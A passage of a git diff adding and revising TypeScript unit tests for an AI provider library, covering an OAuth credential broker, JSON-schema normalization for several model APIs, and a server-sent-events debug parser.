synthetic + // `ReadableStream` (whose reader is locked by `readSseJson`, so any + // `body.cancel()` would throw a `TypeError("locked")` we then swallow). + const captured: { signal?: AbortSignal } = {}; + const fetchImpl: FetchImpl = (async (_input, init) => { + captured.signal = init?.signal ?? undefined; + return fakeResponse([{ type: "done", reason: "stop", message: baseAssistant() }]); + }) as FetchImpl; + const controller = new AbortController(); + await streamPiNative(fakeModel(), baseContext, { + apiKey: "k", + fetch: fetchImpl, + signal: controller.signal, + }).result(); + expect(captured.signal).toBe(controller.signal); + }); +}); diff --git a/packages/ai/test/remote-auth-store.test.ts b/packages/ai/test/remote-auth-store.test.ts new file mode 100644 index 000000000..4003535c4 --- /dev/null +++ b/packages/ai/test/remote-auth-store.test.ts @@ -0,0 +1,180 @@ +import { afterEach, beforeEach, describe, expect, test, vi } from "bun:test"; +import * as fs from "node:fs/promises"; +import * as os from "node:os"; +import * as path from "node:path"; +import { + AuthBrokerClient, + type AuthBrokerServerHandle, + AuthStorage, + REMOTE_REFRESH_SENTINEL, + RemoteAuthCredentialStore, + SqliteAuthCredentialStore, + startAuthBroker, +} from "../src"; +import * as oauthUtils from "../src/utils/oauth"; + +const ANTHROPIC_ENV = ["ANTHROPIC_API_KEY", "ANTHROPIC_OAUTH_TOKEN"] as const; +const savedEnv: Partial<Record<(typeof ANTHROPIC_ENV)[number], string | undefined>> = {}; + +describe("RemoteAuthCredentialStore + AuthStorage integration", () => { + let tempDir = ""; + let serverStore: SqliteAuthCredentialStore | undefined; + let serverStorage: AuthStorage | undefined; + let handle: AuthBrokerServerHandle | undefined; + const token = "remote-bearer"; + + beforeEach(async () => { + for (const key of ANTHROPIC_ENV) { + savedEnv[key] = process.env[key]; + delete process.env[key]; + } + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "auth-broker-remote-")); + serverStore = await SqliteAuthCredentialStore.open(path.join(tempDir, "agent.db")); + serverStore.saveOAuth("anthropic", { + access: "server-access-1", + refresh: "server-refresh-1", + expires: Date.now() - 60_000, // expired so refresh is forced + accountId: "account-1", + email: "a@example.com", + }); + serverStorage = new AuthStorage(serverStore); + await serverStorage.reload(); + handle = startAuthBroker({ + storage: serverStorage, + bind: "127.0.0.1:0", + bearerTokens: [token], + disableRefresher: true, + }); + }); + + afterEach(async () => { + vi.restoreAllMocks(); + await handle?.close(); + serverStorage?.close(); + serverStore?.close(); + await fs.rm(tempDir, { recursive: true, force: true }); + for (const key of ANTHROPIC_ENV) { + if (savedEnv[key] === undefined) delete process.env[key]; + else process.env[key] = savedEnv[key]; + } + }); + + test("client-side AuthStorage refreshes via broker override, never via local OAuth path", async () => { + // Real refresh executed by the broker server; mock surfaces the rotated tokens. + const rotated = { + access: "server-access-rotated", + refresh: "server-refresh-rotated", + expires: Date.now() + 120_000, + accountId: "account-1", + email: "a@example.com", + }; + const refreshSpy = vi.spyOn(oauthUtils, "refreshOAuthToken").mockResolvedValue(rotated); + + const brokerClient = new AuthBrokerClient({ url: handle!.url, token }); + const initialResult = await brokerClient.fetchSnapshot(); + if (initialResult.status !== 200) throw new Error("expected snapshot"); + const initialSnapshot = initialResult.snapshot; + expect(initialSnapshot.credentials).toHaveLength(1); + + const remoteStore = new RemoteAuthCredentialStore({ + client: brokerClient, + initialSnapshot, + }); + + let overrideCalls = 0; + const clientStorage = new AuthStorage(remoteStore, { + refreshOAuthCredential: async (_provider, credentialId, _credential) => { + overrideCalls += 1; + const { entry } = await brokerClient.refreshCredential(credentialId); + if (entry.credential.type !== "oauth") throw new Error("unexpected"); + return { + access: entry.credential.access, + refresh: REMOTE_REFRESH_SENTINEL, + expires: entry.credential.expires, + accountId: entry.credential.accountId, + email: entry.credential.email, + }; + }, + }); + await clientStorage.reload(); + + const apiKey = await clientStorage.getApiKey("anthropic"); + expect(apiKey).toBe("server-access-rotated"); + expect(overrideCalls).toBe(1); + // The local oauth refresh helper was used exactly once — by the broker server. + expect(refreshSpy).toHaveBeenCalledTimes(1); + clientStorage.close(); + }); + + test("RemoteAuthCredentialStore rejects writes from the client", () => { + const remoteStore = new RemoteAuthCredentialStore({ + client: new AuthBrokerClient({ url: handle!.url, token }), + }); + expect(() => remoteStore.replaceAuthCredentialsForProvider("anthropic", [])).toThrow(/read-only/); + expect(() => remoteStore.upsertAuthCredentialForProvider("anthropic", { type: "api_key", key: "x" })).toThrow( + /read-only/, + ); + expect(() => remoteStore.deleteAuthCredentialsForProvider("anthropic", "x")).toThrow(/read-only/); + remoteStore.close(); + }); + + test("getUsageReport coalesces parallel callers and matches by identity", async () => { + const brokerClient = new AuthBrokerClient({ url: handle!.url, token }); + const remoteStore = new RemoteAuthCredentialStore({ + client: brokerClient, + initialSnapshot: { + generation: 0, + generatedAt: 0, + serverNowMs: 0, + refresher: { enabled: false, intervalMs: 0, skewMs: 0, nextSweepInMs: Number.MAX_SAFE_INTEGER }, + credentials: [], + }, + }); + + const reportForA = { + provider: "anthropic" as const, + fetchedAt: Date.now(), + limits: [], + metadata: { email: "a@example.com" }, + }; + const reportForB = { + provider: "anthropic" as const, + fetchedAt: Date.now(), + limits: [], + metadata: { email: "b@example.com" }, + }; + const fetchSpy = vi + .spyOn(brokerClient, "fetchUsage") + .mockResolvedValue({ generatedAt: Date.now(), reports: [reportForA, reportForB] }); + + const credA = { + type: "oauth" as const, + access: "ax", + refresh: REMOTE_REFRESH_SENTINEL, + expires: Date.now() + 60_000, + email: "a@example.com", + }; + const credB = { ...credA, email: "b@example.com" }; + + const [resA, resB] = await Promise.all([ + remoteStore.getUsageReport("anthropic", credA), + remoteStore.getUsageReport("anthropic", credB), + ]); + // Parallel callers share a single broker round-trip. + expect(fetchSpy).toHaveBeenCalledTimes(1); + expect(resA?.metadata?.email).toBe("a@example.com"); + expect(resB?.metadata?.email).toBe("b@example.com"); + + // Cached on the second call — still one fetch total. + const cached = await remoteStore.getUsageReport("anthropic", credA); + expect(cached?.metadata?.email).toBe("a@example.com"); + expect(fetchSpy).toHaveBeenCalledTimes(1); + + // Unknown provider → null, no extra fetch. + const miss = await remoteStore.getUsageReport("openai-codex", credA); + expect(miss).toBeNull(); + expect(fetchSpy).toHaveBeenCalledTimes(1); + + remoteStore.close(); + }); +}); diff --git a/packages/ai/test/schema-compatibility.test.ts b/packages/ai/test/schema-compatibility.test.ts index c268a45f7..db8287211 100644 --- a/packages/ai/test/schema-compatibility.test.ts +++ b/packages/ai/test/schema-compatibility.test.ts @@ -1,9 +1,9 @@ import { describe, expect, it } from "bun:test"; import { adaptSchemaForStrict, - prepareSchemaForCCA, + normalizeSchemaForCCA, + normalizeSchemaForGoogle, type SchemaCompatibilityResult, - sanitizeSchemaForGoogle, validateSchemaCompatibility, validateStrictSchemaEnforcement, } from "@oh-my-pi/pi-ai/utils/schema"; @@ -70,7 +70,7 @@ describe("schema compatibility validation", () => { }); it("validates Google-compatible schemas after sanitization", () => { - const sanitized = sanitizeSchemaForGoogle({ + const sanitized = normalizeSchemaForGoogle({ type: "object", additionalProperties: false, properties: { @@ -100,7 +100,7 @@ describe("schema compatibility validation", () => { }); it("validates Cloud Code Assist Claude schemas after normalization", () => { - const prepared = prepareSchemaForCCA({ + const prepared = normalizeSchemaForCCA({ type: "object", properties: { mode: { anyOf: [{ const: "fast" }, { const: "safe" }, { type: "null" }] }, diff --git a/packages/ai/test/schema-normalization.test.ts b/packages/ai/test/schema-normalization.test.ts index ec0b7fce2..baf413ec7 100644 --- a/packages/ai/test/schema-normalization.test.ts +++ b/packages/ai/test/schema-normalization.test.ts @@ -1,10 +1,13 @@ import { describe, expect, it } from "bun:test"; +import { buildRequest } from "@oh-my-pi/pi-ai/providers/google-gemini-cli"; +import { convertTools } from "@oh-my-pi/pi-ai/providers/google-shared"; +import type { Context, Model, TJsonSchema, Tool } from "@oh-my-pi/pi-ai/types"; import { enforceStrictSchema, mergeCompatibleEnumSchemas, - prepareSchemaForCCA, - sanitizeSchemaForCCA, - sanitizeSchemaForGoogle, + normalizeSchemaForCCA, + normalizeSchemaForGoogle, + normalizeSchemaForMCP, sanitizeSchemaForStrictMode, schemaNeedsDraft202012Upgrade, stripResidualCombiners, @@ -12,6 +15,26 @@ import { upgradeJsonSchemaTo202012, } from "@oh-my-pi/pi-ai/utils/schema"; +function createGoogleCliModel(id: string): Model<"google-gemini-cli"> { + return { + id, + name: id, + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: "https://example.com", + reasoning: false, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 200000, + maxTokens: 8192, + }; +} + // --------------------------------------------------------------------------- // mergeCompatibleEnumSchemas // --------------------------------------------------------------------------- @@ -68,6 +91,24 @@ describe("sanitizeSchemaForStrictMode", () => { }); }); + it("hoists description to the wrapper when wrapping `nullable: true` as an anyOf", () => { + // Sanitize-side nullable wrap mirrors the optional-property wrap shape + // produced by `enforceStrictSchema`: description lives on the wrapper, + // branches stay bare. Both top-level entry points share this contract + // so downstream consumers don't have to special-case which path produced + // the nullable union. + const sanitized = sanitizeSchemaForStrictMode({ + type: "string", + nullable: true, + description: "label", + }); + + expect(sanitized).toEqual({ + anyOf: [{ type: "string" }, { type: "null" }], + description: "label", + }); + }); + it("strips not branches", () => { const schema = { type: "object", @@ -155,12 +196,12 @@ describe("upgradeJsonSchemaTo202012", () => { }); // --------------------------------------------------------------------------- -// sanitizeSchemaForGoogle +// normalizeSchemaForGoogle // --------------------------------------------------------------------------- -describe("sanitizeSchemaForGoogle", () => { +describe("normalizeSchemaForGoogle", () => { it("sets object type when converting an object const to an enum entry", () => { - const sanitized = sanitizeSchemaForGoogle({ + const sanitized = normalizeSchemaForGoogle({ const: { a: 1 }, }); @@ -172,7 +213,7 @@ describe("sanitizeSchemaForGoogle", () => { }); it("deduplicates a deep-equal object const against an existing enum entry", () => { - const sanitized = sanitizeSchemaForGoogle({ + const sanitized = normalizeSchemaForGoogle({ type: "object", enum: [{ a: 1 }], const: { a: 1 }, @@ -186,7 +227,7 @@ describe("sanitizeSchemaForGoogle", () => { }); it("does not stamp a wrong scalar type when const variants span multiple primitive types", () => { - const sanitized = sanitizeSchemaForGoogle({ + const sanitized = normalizeSchemaForGoogle({ anyOf: [ { const: "A", type: "string" }, { const: 1, type: "number" }, @@ -198,15 +239,18 @@ describe("sanitizeSchemaForGoogle", () => { expect(sanitized.type).toBeUndefined(); }); - it("infers null type when const is null", () => { - const sanitized = sanitizeSchemaForGoogle({ const: null }) as Record<string, unknown>; + it("collapses inferred null type to nullable when const is null", () => { + // After python-genai parity (handle_null_fields), bare `type: 'null'` is + // folded into `nullable: true` so the schema is OpenAPI-compatible. + const sanitized = normalizeSchemaForGoogle({ const: null }) as Record<string, unknown>; - expect(sanitized.type).toBe("null"); + expect(sanitized.type).toBeUndefined(); + expect(sanitized.nullable).toBe(true); expect(sanitized.enum).toEqual([null]); }); it("preserves a property schema literally named additionalProperties inside properties", () => { - const sanitized = sanitizeSchemaForGoogle({ + const sanitized = normalizeSchemaForGoogle({ type: "object", properties: { additionalProperties: false, @@ -228,10 +272,13 @@ describe("sanitizeSchemaForGoogle", () => { required: ["additionalProperties"], } as const; - expect(sanitizeSchemaForGoogle(schema)).toEqual(schema); + expect(normalizeSchemaForGoogle(schema)).toEqual(schema); }); - it("strips unresolved $ref and $defs entries for Google compatibility", () => { + it("inlines local $ref / $defs entries for Google compatibility", () => { + // Mirrors python-genai/_transformers.py:754-774 ($defs inlining via + // `process_schema`) and tests/transformers/test_schema.py:: + // test_process_schema_order_properties_propagates_into_defs. const schema = { type: "object", properties: { @@ -249,14 +296,57 @@ describe("sanitizeSchemaForGoogle", () => { }, } as const; - expect(sanitizeSchemaForGoogle(schema)).toEqual({ + expect(normalizeSchemaForGoogle(schema)).toEqual({ type: "object", properties: { - user: {}, + user: { + type: "object", + properties: { + id: { type: "string" }, + }, + required: ["id"], + }, }, required: ["user"], }); }); + + it("lifts stripped validation keywords into description", () => { + const normalized = normalizeSchemaForGoogle({ + type: "string", + pattern: "^\\d+$", + minLength: 1, + maxLength: 8, + description: "ID", + }) as Record<string, unknown>; + + expect(normalized.pattern).toBeUndefined(); + expect(normalized.minLength).toBeUndefined(); + expect(normalized.maxLength).toBeUndefined(); + expect(normalized.description).toBe('ID\n\n{pattern: "^\\\\d+$", minLength: 1, maxLength: 8}'); + }); +}); + +// --------------------------------------------------------------------------- +// normalizeSchemaForMCP +// --------------------------------------------------------------------------- + +describe("normalizeSchemaForMCP", () => { + it("keeps validation keywords without mutating description", () => { + const normalized = normalizeSchemaForMCP({ + type: "string", + pattern: "^\\d+$", + minLength: 1, + description: "ID", + }) as Record<string, unknown>; + + expect(normalized).toEqual({ + type: "string", + pattern: "^\\d+$", + minLength: 1, + description: "ID", + }); + }); }); // --------------------------------------------------------------------------- @@ -399,12 +489,12 @@ describe("stripResidualCombiners", () => { }); // --------------------------------------------------------------------------- -// sanitizeSchemaForCCA and prepareSchemaForCCA +// normalizeSchemaForCCA // --------------------------------------------------------------------------- -describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { +describe("normalizeSchemaForCCA", () => { it("collapses same-type anyOf variants when mixed-type collapse bails out", () => { - const prepared = prepareSchemaForCCA({ + const prepared = normalizeSchemaForCCA({ type: "object", properties: { value: { @@ -425,7 +515,7 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { }); it("applies Google unsupported-key stripping before CCA-specific normalization", () => { - const sanitized = sanitizeSchemaForCCA({ + const sanitized = normalizeSchemaForCCA({ type: "object", additionalProperties: false, properties: { @@ -451,14 +541,81 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { }, name: { type: "string", + description: '{minLength: 2, pattern: "^[a-z]+$"}', }, }, required: ["config", "name"], }); }); + it("lifts stripped validation keywords into description", () => { + const normalized = normalizeSchemaForCCA({ + type: "string", + pattern: "^\\d+$", + minLength: 1, + maxLength: 8, + description: "ID", + }) as Record<string, unknown>; + + expect(normalized.pattern).toBeUndefined(); + expect(normalized.minLength).toBeUndefined(); + expect(normalized.maxLength).toBeUndefined(); + expect(normalized.description).toBe('ID\n\n{pattern: "^\\\\d+$", minLength: 1, maxLength: 8}'); + }); + + it("uses the same merged object output in shared and gemini-cli Antigravity paths", () => { + const parameters = { + anyOf: [ + { + type: "object", + properties: { + shared: { type: "string" }, + a: { type: "string" }, + }, + required: ["shared"], + }, + { + type: "object", + properties: { + shared: { type: "string" }, + b: { type: "number" }, + }, + required: ["shared"], + }, + ], + } as TJsonSchema; + const tools: Tool[] = [{ name: "merge_test", description: "Merge test", parameters }]; + + const sharedTools = convertTools(tools, createGoogleCliModel("claude-sonnet-4-5")); + const sharedDeclaration = sharedTools?.[0]?.functionDeclarations[0] as Record<string, unknown>; + + const context: Context = { + messages: [{ role: "user", content: "hello", timestamp: 0 }], + tools, + }; + const antigravityRequest = buildRequest(createGoogleCliModel("gemini-2.5-pro"), context, "project", {}, true); + const antigravityDeclaration = antigravityRequest.request.tools?.[0]?.functionDeclarations[0] as Record< + string, + unknown + >; + + const expected = { + type: "object", + properties: { + shared: { type: "string" }, + a: { type: "string" }, + b: { type: "number" }, + }, + required: ["shared"], + }; + expect(sharedDeclaration.parameters).toEqual(expected); + expect(antigravityDeclaration.parameters).toEqual(expected); + expect(antigravityDeclaration.parameters).toEqual(sharedDeclaration.parameters); + expect(antigravityDeclaration.parametersJsonSchema).toBeUndefined(); + }); + it("does not retain stale required keys after an object-union anyOf merge", () => { - const prepared = prepareSchemaForCCA({ + const prepared = normalizeSchemaForCCA({ required: ["a"], anyOf: [ { @@ -511,7 +668,7 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { required: ["profile"], } as const; - const normalized = prepareSchemaForCCA(schema) as { + const normalized = normalizeSchemaForCCA(schema) as { properties?: { profile?: { type?: string; @@ -534,8 +691,8 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { }; (circular.properties as Record<string, unknown>).self = circular; - expect(() => prepareSchemaForCCA(circular)).not.toThrow(); - expect(prepareSchemaForCCA(circular)).toEqual({ + expect(() => normalizeSchemaForCCA(circular)).not.toThrow(); + expect(normalizeSchemaForCCA(circular)).toEqual({ type: "object", properties: { self: {}, @@ -548,7 +705,7 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { type: "invalid-type-token", } as Record<string, unknown>; - expect(prepareSchemaForCCA(ajvInvalid)).toEqual({ + expect(normalizeSchemaForCCA(ajvInvalid)).toEqual({ type: "object", properties: {}, }); @@ -556,7 +713,7 @@ describe("sanitizeSchemaForCCA and prepareSchemaForCCA", () => { }); // --------------------------------------------------------------------------- -// Circular schema safety (sanitizeSchemaForGoogle + sanitizeSchemaForStrictMode) +// Circular schema safety (normalizeSchemaForGoogle + sanitizeSchemaForStrictMode) // --------------------------------------------------------------------------- describe("circular schema safety", () => { @@ -567,7 +724,7 @@ describe("circular schema safety", () => { }; (circular.properties as Record<string, unknown>).self = circular; - expect(() => sanitizeSchemaForGoogle(circular)).not.toThrow(); + expect(() => normalizeSchemaForGoogle(circular)).not.toThrow(); expect(() => sanitizeSchemaForStrictMode(circular)).not.toThrow(); }); }); diff --git a/packages/ai/test/schema-strict-mode.test.ts b/packages/ai/test/schema-strict-mode.test.ts index 78138d90f..462eaecba 100644 --- a/packages/ai/test/schema-strict-mode.test.ts +++ b/packages/ai/test/schema-strict-mode.test.ts @@ -223,7 +223,7 @@ describe("sanitizeSchemaForStrictMode", () => { expect(retries.description).toBe("retry count (default: 3)"); }); - it("inlines defaults through the type-array (nullable) branch", () => { + it("hoists shared description to the wrapper when expanding a nullable type-array", () => { const schema = { type: ["number", "null"], description: "timeout", @@ -233,10 +233,193 @@ describe("sanitizeSchemaForStrictMode", () => { const sanitized = sanitizeSchemaForStrictMode(schema); const variants = sanitized.anyOf as Array<Record<string, unknown>>; const numberVariant = variants.find(v => v.type === "number"); + const nullVariant = variants.find(v => v.type === "null"); - expect(numberVariant).toBeDefined(); - expect((numberVariant as Record<string, unknown>).default).toBeUndefined(); - expect((numberVariant as Record<string, unknown>).description).toBe("timeout (default: 60)"); + // Description with the inlined `(default: …)` suffix lives on the + // wrapper, not duplicated onto each variant — matches the optional- + // property wrap shape produced by `enforceStrictSchema`. + expect(sanitized.description).toBe("timeout (default: 60)"); + expect(numberVariant).toEqual({ type: "number" }); + expect(nullVariant).toEqual({ type: "null" }); + }); + // Mirrors: openai-python/tests/lib/test_pydantic.py::test_nested_inline_ref_expansion + // SDK behavior: a `$ref` with sibling keys (e.g. description) must be unraveled — + // resolve the ref, merge its contents, then let the sibling keys override the def's. + it("unravels `$ref` with sibling keys by inlining the resolved def (siblings win)", () => { + const schema = { + type: "object", + $defs: { + Star: { + type: "object", + properties: { name: { type: "string", description: "The name of the star." } }, + required: ["name"], + }, + }, + properties: { + largest_star: { + $ref: "#/$defs/Star", + description: "The largest star in the galaxy.", + }, + }, + required: ["largest_star"], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + const props = sanitized.properties as Record<string, Record<string, unknown>>; + const largest = props.largest_star; + + // $ref dropped; def contents inlined. + expect(largest.$ref).toBeUndefined(); + expect(largest.type).toBe("object"); + // Sibling description wins over any description in the def. + expect(largest.description).toBe("The largest star in the galaxy."); + // Nested properties from the def are present. + const nested = largest.properties as Record<string, Record<string, unknown>>; + expect(nested.name.type).toBe("string"); + }); + + // SDK: a bare `$ref` (no sibling keys) is preserved as-is; only siblings trigger unravel. + // Cite: openai-python/src/openai/lib/_pydantic.py:96-110 (`has_more_than_n_keys`) + it("preserves bare `$ref` with no sibling keys", () => { + const schema = { + type: "object", + $defs: { Foo: { type: "string" } }, + properties: { foo: { $ref: "#/$defs/Foo" } }, + required: ["foo"], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + const props = sanitized.properties as Record<string, Record<string, unknown>>; + expect(props.foo).toEqual({ $ref: "#/$defs/Foo" }); + }); + + // SDK: when a `$ref` cannot be resolved (external / unknown segment), leave it alone + // rather than dropping data. Our sanitizer falls back to passing it through. + it("leaves unresolvable `$ref` siblings intact", () => { + const schema = { + type: "object", + properties: { + foo: { $ref: "#/$defs/Missing", description: "x" }, + }, + required: ["foo"], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + const props = sanitized.properties as Record<string, Record<string, unknown>>; + expect(props.foo.$ref).toBe("#/$defs/Missing"); + expect(props.foo.description).toBe("x"); + }); + + // Mirrors: openai-python SDK rule — `allOf` with exactly one entry is inlined + // and `allOf` is removed; with multiple entries `allOf` is recursed instead. + // Cite: openai-python/src/openai/lib/_pydantic.py:79-83 + it("inlines single-element `allOf` and drops the keyword", () => { + const schema = { + type: "object", + properties: { + wrapped: { + allOf: [{ type: "string", description: "from allOf" }], + }, + }, + required: ["wrapped"], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + const props = sanitized.properties as Record<string, Record<string, unknown>>; + expect(props.wrapped.allOf).toBeUndefined(); + expect(props.wrapped.type).toBe("string"); + expect(props.wrapped.description).toBe("from allOf"); + }); + + // Cite: openai-python/src/openai/lib/_pydantic.py:79-83 — `json_schema.update(ensured)` + // means the inlined entry's keys WIN over original sibling keys. + it("inlines single-element `allOf` with the inlined entry winning over siblings", () => { + const schema = { + type: "string", + description: "outer", + allOf: [{ description: "inner" }], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + expect(sanitized.allOf).toBeUndefined(); + expect(sanitized.description).toBe("inner"); + }); + + // SDK does NOT inline `allOf` with more than one entry — it recurses each branch. + // Cite: openai-python/src/openai/lib/_pydantic.py:84-88 + it("does not collapse `allOf` when it has multiple entries", () => { + const schema = { + type: "object", + properties: { + combo: { + allOf: [ + { type: "object", properties: { a: { type: "string" } }, required: ["a"] }, + { type: "object", properties: { b: { type: "number" } }, required: ["b"] }, + ], + }, + }, + required: ["combo"], + } as Record<string, unknown>; + + const sanitized = sanitizeSchemaForStrictMode(schema); + const props = sanitized.properties as Record<string, Record<string, unknown>>; + const combo = props.combo as Record<string, unknown>; + expect(Array.isArray(combo.allOf)).toBe(true); + expect((combo.allOf as unknown[]).length).toBe(2); + }); + + // Mirrors: openai-python/tests/lib/test_pydantic.py::test_nested_inline_ref_expansion + // End-to-end via tryEnforceStrictSchema: a tree mixing nested objects and a $ref-with-sibling + // description gets `additionalProperties: false` on every object node and every + // property forced into `required` — matching the SDK's strict snapshot. + it("end-to-end: nested objects all get additionalProperties:false + full required (SDK parity)", () => { + const schema = { + type: "object", + $defs: { + Star: { + type: "object", + properties: { name: { type: "string", description: "The name of the star." } }, + required: ["name"], + }, + }, + properties: { + name: { type: "string", description: "The name of the universe." }, + galaxy: { + type: "object", + properties: { + name: { type: "string", description: "The name of the galaxy." }, + largest_star: { $ref: "#/$defs/Star", description: "The largest star." }, + }, + required: ["name", "largest_star"], + }, + }, + required: ["name", "galaxy"], + } as Record<string, unknown>; + + const { schema: strict, strict: isStrict } = tryEnforceStrictSchema(schema); + expect(isStrict).toBe(true); + expect(strict.additionalProperties).toBe(false); + expect(strict.required).toEqual(["name", "galaxy"]); + + const rootProps = strict.properties as Record<string, Record<string, unknown>>; + const galaxy = rootProps.galaxy; + expect(galaxy.additionalProperties).toBe(false); + expect(galaxy.required).toEqual(["name", "largest_star"]); + + const galaxyProps = galaxy.properties as Record<string, Record<string, unknown>>; + const largest = galaxyProps.largest_star; + // $ref was unraveled — inlined as a real object node. + expect(largest.$ref).toBeUndefined(); + expect(largest.type).toBe("object"); + expect(largest.additionalProperties).toBe(false); + expect(largest.required).toEqual(["name"]); + // Sibling description survived the unravel. + expect(largest.description).toBe("The largest star."); + + // The original $def was also enforced strict-mode style. + const defs = strict.$defs as Record<string, Record<string, unknown>>; + expect(defs.Star.additionalProperties).toBe(false); + expect(defs.Star.required).toEqual(["name"]); }); }); @@ -506,6 +689,42 @@ describe("tryEnforceStrictSchema", () => { expect(updateTasks.additionalProperties).toBe(false); expect(updateTasks.required).toEqual(["content", "status", "notes"]); }); + + it("falls back to non-strict for mixed-primitive enum roots (no representable type)", () => { + // `{enum:[1, "two", null]}` cannot be reduced to a single `type` keyword, + // so strict mode cannot accept it. Older releases set `strict: true` with + // a typeless `{enum:[...]}` schema that OpenAI strict mode would reject + // on the wire; the contract is now to fall back to non-strict instead. + const result = tryEnforceStrictSchema({ enum: [1, "two", null] }); + expect(result.strict).toBe(false); + expect(result.schema).toEqual({ enum: [1, "two", null] }); + }); + + it("falls back to non-strict for non-primitive const roots", () => { + const objectResult = tryEnforceStrictSchema({ const: { a: 1 } }); + expect(objectResult.strict).toBe(false); + expect(objectResult.schema).toEqual({ const: { a: 1 } }); + + const arrayResult = tryEnforceStrictSchema({ const: [1, 2, 3] }); + expect(arrayResult.strict).toBe(false); + expect(arrayResult.schema).toEqual({ const: [1, 2, 3] }); + }); + + it("infers a primitive type from enum/const when calling enforceStrictSchema directly", () => { + // `enforceStrictSchema` is a public API. Callers that pass a bare + // `{enum:[primitives]}` (without first running sanitize) still get a + // `type` filled in so the result is wire-valid. + const enumResult = enforceStrictSchema({ enum: ["draft", "published"] }); + expect(enumResult).toEqual({ type: "string", enum: ["draft", "published"] }); + + const constResult = enforceStrictSchema({ const: 7 }); + expect(constResult).toEqual({ type: "number", const: 7 }); + + // Mixed-primitive enum still throws — caller must fall back via tryEnforce. + expect(() => enforceStrictSchema({ enum: [1, "two"] })).toThrow(); + // Non-primitive const still throws — caller must fall back via tryEnforce. + expect(() => enforceStrictSchema({ const: { a: 1 } })).toThrow(); + }); }); describe("json-schema validator unsupported-keyword regressions", () => { diff --git a/packages/ai/test/sse-debug.test.ts b/packages/ai/test/sse-debug.test.ts new file mode 100644 index 000000000..7260c67a5 --- /dev/null +++ b/packages/ai/test/sse-debug.test.ts @@ -0,0 +1,205 @@ +import { describe, expect, it } from "bun:test"; +import type { RawSseEvent } from "../src/types"; +import { wrapFetchForSseDebug } from "../src/utils/sse-debug"; + +/** + * Exercises the inline SSE tee + parser in `sse-debug.ts`. There is no direct + * export for `SseTeeParser`; we drive it through `wrapFetchForSseDebug`, which + * is the only production caller. Each test: + * 1. Builds a mock `fetch` that returns a `text/event-stream` Response whose + * body emits a caller-controlled sequence of byte chunks (so we can + * exercise partial-line carry-forward and CR-LF handling deterministically). + * 2. Calls the wrapped fetch. + * 3. Reads the response body to completion so the `TransformStream` `flush` + * runs. + * 4. Asserts the events the observer received exactly match expectations. + * + * The point is to lock in behavior across the ASCII-fast-path / byte-level- + * field-parse rewrite: the observer MUST receive the same `{ event, data, raw }` + * shape it received with the prior decode-then-string-slice implementation. + */ + +function chunkedStream(chunks: Uint8Array[]): ReadableStream<Uint8Array> { + let i = 0; + return new ReadableStream<Uint8Array>({ + pull(controller) { + if (i >= chunks.length) { + controller.close(); + return; + } + controller.enqueue(chunks[i++]); + }, + }); +} + +function sseResponse(chunks: Uint8Array[]): Response { + return new Response(chunkedStream(chunks), { + status: 200, + headers: { "content-type": "text/event-stream" }, + }); +} + +const enc = new TextEncoder(); +const b = (s: string): Uint8Array => enc.encode(s); + +async function drain(response: Response): Promise<void> { + const reader = response.body!.getReader(); + for (;;) { + const { done } = await reader.read(); + if (done) return; + } +} + +async function collect(chunks: Uint8Array[]): Promise<RawSseEvent[]> { + const events: RawSseEvent[] = []; + const fetchImpl = async () => sseResponse(chunks); + const wrapped = wrapFetchForSseDebug(fetchImpl, event => { + events.push(event); + }); + const response = await wrapped("https://example.test/stream"); + await drain(response); + return events; +} + +describe("sse-debug parser", () => { + it("parses a single event terminated by blank line", async () => { + const events = await collect([b("event: message\ndata: hello\n\n")]); + expect(events).toEqual([{ event: "message", data: "hello", raw: ["event: message", "data: hello"] }]); + }); + + it("joins multi-line data fields with newlines", async () => { + const events = await collect([b("data: line1\ndata: line2\ndata: line3\n\n")]); + expect(events).toHaveLength(1); + expect(events[0]!.event).toBe(null); + expect(events[0]!.data).toBe("line1\nline2\nline3"); + expect(events[0]!.raw).toEqual(["data: line1", "data: line2", "data: line3"]); + }); + + it("strips a single leading SP after the colon but preserves further spaces", async () => { + const events = await collect([b("data: two-leading-spaces\n\n")]); + expect(events[0]!.data).toBe(" two-leading-spaces"); + }); + + it("retains comment (`:`-prefixed) lines in raw but does not parse them", async () => { + const events = await collect([b(": heartbeat\ndata: payload\n\n")]); + expect(events).toHaveLength(1); + expect(events[0]!.data).toBe("payload"); + expect(events[0]!.raw).toEqual([": heartbeat", "data: payload"]); + }); + + it("does not dispatch on a blank line if no event/data accumulated (pure heartbeats)", async () => { + const events = await collect([b(": ping\n\n: ping\n\n")]); + expect(events).toHaveLength(0); + }); + + it("handles CR-LF line endings and strips the CR before dispatch", async () => { + const events = await collect([b("event: ping\r\ndata: pong\r\n\r\n")]); + expect(events).toEqual([{ event: "ping", data: "pong", raw: ["event: ping", "data: pong"] }]); + }); + + it("ignores unknown fields (`id`, `retry`, gibberish) but keeps them in raw", async () => { + const events = await collect([b("id: 42\nretry: 1000\nfoo: bar\ndata: ok\n\n")]); + expect(events).toHaveLength(1); + expect(events[0]!.event).toBe(null); + expect(events[0]!.data).toBe("ok"); + expect(events[0]!.raw).toEqual(["id: 42", "retry: 1000", "foo: bar", "data: ok"]); + }); + + it("treats a line with no colon as field-with-empty-value (data line still recorded)", async () => { + // Per SSE spec a bare `data` line is treated as `data:` with empty value. + const events = await collect([b("data\ndata: x\n\n")]); + expect(events).toHaveLength(1); + expect(events[0]!.data).toBe("\nx"); + }); + + it("reassembles events split across arbitrary chunk boundaries", async () => { + // Split a single event across chunks: mid-field-name, mid-value, mid-LF-CRLF. + const events = await collect([b("eve"), b("nt: x\r"), b("\ndata: a"), 